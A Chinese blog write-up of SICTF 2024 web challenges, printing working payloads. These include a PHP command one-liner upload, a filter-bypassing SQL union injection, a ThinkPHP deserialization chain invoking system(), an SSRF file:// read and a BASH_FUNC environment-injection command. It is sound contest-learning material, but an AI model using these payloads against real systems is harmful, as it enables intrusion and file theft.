SICTF 2024

于 2024-02-21 20:05:49 发布
阅读量481 收藏 9
点赞数 7
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45906533/article/details/136219562
版权

100%_upload

在这里插入图片描述

<?=`cat /flag`?>

在这里插入图片描述

hacker

跑了一遍字典,发现注入的东西有很多,空格、or、and,但是没有禁用union和select
在这里插入图片描述
那就很明显了,联合查询user()发现最高权限是root,然后我就试试能不能读取文件,发现load_file可以读取\

<?php
echo "<!--flag在flag表里-->";
echo "<br>";
$servername = "localhost";
$username = "root";
$password = "123456";
$dbname = "ctf";

// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
$username=strtolower($_GET['username']);
$sensitive_keywords = array(" ","handler", "like", "or", "-~", "--", "--+", "information", "xor", "and", ";", "&", "|", "order", "floor","sys_tables","sys_columns","sys.schema_table_statistics_with_buffer","sys.schema_table_statistics","mid", "ascii");

// 检查参数中是否包含敏感关键词
foreach ($sensitive_keywords as $keyword) {
    if (strpos($username, $keyword) !== false) {
        // 如果参数中包含敏感关键词,弹窗提示用户
        die("<script>alert('hacker');</script>");
        // 可以选择终止脚本执行或者做其他处理
        exit;
    }
}
$sql="select id from flag where id='$username'";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
    // 输出每一行记录的 love 字段值
    while($row = $result->fetch_assoc()) {
        echo "          " . $row["id"] . "<br>";
    }
} else {
    echo "0 结果";
}
// echo $result->num_rows;
// 关闭数据库连接
$conn->close();
?>

根据它这个表里面的过滤信息,我们直接无列名注入即可
payload:

http://yuanshen.life:35522/?username=alice'union/**/select/**/`2`/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)a%23

在这里插入图片描述

Oyst3rPHP

在这里插入图片描述
扫描目录可以得到一个www.zip

由于这是thinkphp框架写的,所以网站的首页是在app----controller目录里
在这里插入图片描述

<?php
namespace app\controller;
use app\BaseController;

class Index extends BaseController
{

    public function index()
    {
		echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
        echo "<img src='../Oyster.png'"."/>";

  
		$payload = base64_decode(@$_POST['payload']);
        $right = @$_GET['left'];
        $left = @$_GET['right'];
  
		$key = (string)@$_POST['key'];
        if($right !== $left && md5($right) == md5($left)){
  
			echo "Congratulations on getting your first oyster";
			echo "<img src='../Oyster1.png'"."/>";
  
			if(preg_match('/.+?THINKPHP/is', $key)){
                die("Oysters don't want you to eat");
            }
            if(stripos($key, '603THINKPHP') === false){
                die("!!!Oysters don't want you to eat!!!");
            }

			echo "WOW!!!Congratulations on getting your second oyster";
			echo "<img src='../Oyster2.png'"."/>";
  
			@unserialize($payload);
			//最后一个生蚝在根目录,而且里面有Flag???咋样去找到它呢???它的名字是什么???
			//在源码的某处注释给出了提示,这就看你是不是真懂Oyst3rphp框架咯!!!
			//小Tips:细狗函数┗|`O′|┛ 嗷~~
        }
    }

	public function doLogin()
    {
    /*emmm我也不知道这是what,瞎写的*/
        if ($this->request->isPost()) {
            $username = $this->request->post('username');
            $password = $this->request->post('password');

   
            if ($username == 'your_username' && $password == 'your_password') {
  
                $this->success('Login successful', 'index/index');
            } else {
    
                $this->error('Login failed');
            }
        }
    }



}

很简单的逻辑,就是md5弱比较、正则回溯,然后反序列化而已

序列化的链子直接摘抄网上的就行了

<?php
 namespace think\model\concern;
 trait Attribute
 {
     private $data = ["key"=>"cat /Oyst3333333r.php"];
     private $withAttr = ["key"=>"system"];
 }
 namespace think;
 abstract class Model
 {
     use model\concern\Attribute;
     private $lazySave = true;
     protected $withEvent = false;
     private $exists = true;
     private $force = true;
     protected $name;
     public function __construct($obj=""){
         $this->name=$obj;
     }
 }
 namespace think\model;
 use think\Model;
 class Pivot extends Model
 {}
 $a=new Pivot();
 $b=new Pivot($a);
 echo base64_encode(serialize($b));



import requests
pay = "TzoxNzoidGhpbmtcbW9kZWxcUGl2b3QiOjc6e3M6MjE6IgB0aGlua1xNb2RlbABsYXp5U2F2ZSI7YjoxO3M6MTI6IgAqAHdpdGhFdmVudCI7YjowO3M6MTk6IgB0aGlua1xNb2RlbABleGlzdHMiO2I6MTtzOjE4OiIAdGhpbmtcTW9kZWwAZm9yY2UiO2I6MTtzOjc6IgAqAG5hbWUiO086MTc6InRoaW5rXG1vZGVsXFBpdm90Ijo3OntzOjIxOiIAdGhpbmtcTW9kZWwAbGF6eVNhdmUiO2I6MTtzOjEyOiIAKgB3aXRoRXZlbnQiO2I6MDtzOjE5OiIAdGhpbmtcTW9kZWwAZXhpc3RzIjtiOjE7czoxODoiAHRoaW5rXE1vZGVsAGZvcmNlIjtiOjE7czo3OiIAKgBuYW1lIjtzOjA6IiI7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czozOiJrZXkiO3M6MjE6ImNhdCAvT3lzdDMzMzMzMzNyLnBocCI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjM6ImtleSI7czo2OiJzeXN0ZW0iO319"
url = "http://yuanshen.life:37346/?left=s1885207154a&right=s1502113478a"
data = {
    "key":"a"*1000000+"603THINKPHP",
    "payload":pay
}
res = requests.post(url=url,data=data)
print(res.text)

在这里插入图片描述

EZ_SSRF

<?php
highlight_file(__file__);
error_reporting(0);
function get($url) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($curl);
    curl_close($curl);
    echo base64_encode($data);
    return $data;
}
class client{
    public $url;
    public $payload;
    public function __construct()
    {
        $url = "http://127.0.0.1/";
        $payload = "system(\"cat /flag\");";
        echo "Exploit";
    }
    public function __destruct()
    {
        get($this->url);
    }
}
// hint:hide other file
if(isset($_GET['Harder'])) {
    unserialize($_GET['Harder']);
} else {
    echo "You don't know how to pass parameters?";
}

?>

很简单的一道题,反序列化然后通过ssrf漏洞直接读取flag.php文件

<?php
class client{
    public $url;
    public $payload;
}
$a = new client;
$a->url = "file:///var/www/html/flag.php";
echo serialize($a);
?>

这里应该算是一个小小的非预期吧,因为出题人的目的应该是在admin.php里

<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
$allowed_ip = "127.0.0.1";
if ($_SERVER['REMOTE_ADDR'] !== $allowed_ip) {
    die("You can't get flag");
} else {
    echo $flag;
}
?>

在这里插入图片描述

Not just unserialize

<?php

highlight_file(__FILE__);
class start
{
    public $welcome;
    public $you;
    public function __destruct()
    {
        $this->begin0fweb();
    }
    public  function begin0fweb()
    {
        $p='hacker!';
        $this->welcome->you = $p;
    }
}

class SE{
    public $year;
    public function __set($name, $value){
        echo '  Welcome to new year!  ';
        echo($this->year);
    }
}

class CR {
    public $last;
    public $newyear;

    public function __tostring() {

        if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i',$this->newyear))
        {
            echo "empty it!";
            return 0;
        }

        if(preg_match('/^.*(worries).*$/',$this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year  ';
            empty($this->last->worries);
        }
        return false;
    }
}

class ET{

    public function __isset($name)
    {
        foreach ($_GET['get'] as $inject => $rce){
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }
}
if(isset($_REQUEST['go'])){
    unserialize(base64_decode($_REQUEST['go']));
}
?>

php反序列化,先找到入口点

statr---->destruct----->begin0fweb----->SE----->set---->tostring------>isset

根据上面的链子编写exp

<?php
class start
{
    public $welcome;
    public $you;
}

class SE{
    public $year;
}

class CR {
    public $last;
    public $newyear;
}

class ET{
}
$s = new start;
$s->welcome = new SE;
$s->welcome->year = new CR;
#这里大小写绕过一下
$s->welcome->year->newyear = "Worries";
$s->welcome->year->last = new ET;
echo base64_encode(serialize($s));
?>

在这里插入图片描述
成功的来到了这里,接下来就是一个老生常谈的一个考点了,环境变量注入

p牛的文章狠狠的推荐一遍

https://www.leavesongs.com/PENETRATION/how-I-hack-bash-through-environment-injection.html

最后的payload

http://yuanshen.life:39676/?go=Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo3OiJXb3JyaWVzIjt9fXM6MzoieW91IjtOO30&get[BASH_FUNC_echo%25%25]=()%20{%20cat /ffffllllllaaaaaaaaaaaaaaaaaaggggg;%20}

在这里插入图片描述

还有两题Java,比赛到后面的时候也没时间去解了,跑去看vnctf了

Ten^v^
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
知道你很急但是你先别急之sictfwp(一)
m0_66325902的博客
01-29 286
sictf pwn writeup
献给web安全的CTF课堂小测
weixin_44765508的博客
11-18 1151
What’s your want? 根据题目提示:Do you want flag?输入“flag”,返回一个加密字符串 2. base64 解密得到:flag{WelC0me_to_ctf2} php is the best 点击“another page”,查看源码,发现web目录的树结构中有flag文件 源码中还有对file路径的过滤: strpos():查找字符串第一次出现位置 https://www.w3school.com.cn/php/func_string_str
SICTF2023 WP
qq_63928796的博客
01-20 3248
highlight_file(__FILE__); error_reporting(0); class Happy{ private $cmd; private $content; public function __construct($cmd, $content) { $this->cmd = $cmd; $this->content = $content; } public function __call($name
SICTF(剩余wp)
qq_62046696的博客
02-08 454
这是过滤之前的,至于为什么是132呢那是因为脚本跑出来的,然后这个模板中有os所以可以popen利用?
2023SICTF web wp
m0_63138919的博客
08-27 1165
本文为2023SICTF web题解的wp 供大家学习 也希望大家提出更好的解法 一起学习
ISCTF2022部分wp
m0_73952121的博客
11-07 941
ISCTF2022部分wp
SICTF 2023 真题
09-10
【标题】"SICTF 2023 真题"揭示了这是一场网络安全竞赛,CTF(Capture The Flag)是此类竞赛的常见形式,通常涉及逆向工程、密码学、网络攻防等多方面的技术挑战。SICTF(可能是某个特定组织或地区举办的网络安全...
CTF学习笔记——Upload
Obs_cure的博客
02-08 2566
一、 1.题目 2.解题步骤 3.总结 4.参考资料
CTF——MISC习题讲解(流量分析winshark系列~二)
tlovejr的博客
03-15 5031
CTF——MISC习题讲解(流量分析winshark系列) 前言 上一章节我们已经做完一场流量分析杂项题目,接下来继续给大家讲解流量分析系列。 一、misc4 打开题目后除了一个流分包还有一个txt文档 既然都这么告诉了,那就直接在统计里寻找一下这个特殊的PHP文件 然后直接在界面搜索一下这个文件看看 直接能得到flag,其实这个题也就是基础题,并不是太难,只要会统计这个功能几乎就可以的。 flag{FLAG-GehFMsqCeNvof5szVpB2Dmjx} 二、telnet 打开题目后发现还是有一
2023 SICTF --- wp
3tefanie丶zhou的博客
01-19 5140
【观海者难为水,痴心者难为情,男女情爱之苦乐,不过是意中人变成了忆中人,心上人变成了枕边人。】
SICTF2023-Crypto-wp
网安小菜鸡
01-20 548
密码wp
2023-SICTF-Round-2-WP
刘十三t的博客
09-14 348
(3)攻击者可以得到每一份加密后的密文和对应的模数n、加密指数e。(2)同一份明文使用不同的模数n,相同的加密指数e进行多次加密。师傅的脚本做出来的。本次赛中尝试过那个脚本,无果。另外,在做这一题之前,我做过一题类似的(当时不知道是。但注意的是,当满足以下条件时才能。思路:看了题目后,第一反应就是爆破。在这个加密过程中,值得一提的是。要特别注意下标,很容易弄错。这里解释一下这一段代码,因为。简单来说,相关信息攻击就是。(很大),所以这里选择消去。(1)加密指数e非常小。与0.44很接近时,
SICTF2023 misc-wp
网安小菜鸡
01-20 1383
misc杂项
2023SICTF部分wp
arcuied
01-19 1739
2023SICTF部分wp
2023SICTF-web-白猫-[签到]Include
最新发布
m0_73734159的博客
11-28 677
题目名称:[签到]Include#题目简介:flag位于flag.php,是一个非常简单的文件包含捏~#题目环境:#函数理解:substr() 函数返回字符串的一部分如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。语法参数string,必需,规定要返回其中一部分的字符串参数start,必需,规定在字符串的何处开始正数 - 在字符串的指定位置开始负数 - 在从字符串结尾开始的指定位置开始。
PHP操作mysql数据库
ydw247424的博客
08-29 88
1.PDO连接 //连接mysql数据库语句 $conn=new PDO("mysql:host=127.0.0.1;dbname=myclass;port=3306;charset=utf8",'root','root'); //sql语句 查询数据库中的所有数据 $sql="select * from my_student"; //预处理 $result=$conn->prepa...
ISCTF赛后总结
xiaf5的博客
10-24 2285
学了一个月的菜鸡,第一次打ctf比赛,感觉自己实在太菜了,总结总结经验。 Web 跟着队友混,队友Web贼强,Web全AK. CRYPTO 弯弯曲曲的路 不合格的pwn手竟然拿到密码题的一血。。。 题目描述:一只古典的蓝鲨从一条路的尽头上下上下上的走过了弯弯曲曲的小路上,并且经过了5棵树还有5个银行。 打开下载的文件,文件名为zip格式提示用zip格式打开解压缩。 根据题目描述,应该是5组,每组5个 分组后仔细观察,发现flag是交叉式的。 ISCTF{Welc0nne_..
SICTF2023 Osint-wp
网安小菜鸡
01-20 653
社工
NSSCTF刷题wp——常用编码
YougerXen的博客
04-10 4370
NSSCTF Crypto 探索 常用编码 前两个题ID303,287在入门时做过了,详见另一篇wp链接 [AFCTF 2018]BASE ID:463 打开文件直接麻了,如果人工解码,估计黄花菜都要凉了,这就需要用到拥有强大数据处理能力的python了,下面是我借鉴得几个大佬的脚本。 首先是大佬xenny的,NSSCTF这个题的wp也有 import re, base64 s = open('/Users/x3nny/Downloads/flag_encode.txt', 'rb').read() bas
实验四 CTF实践
qq_45538874的博客
12-09 353
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ten^v^

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值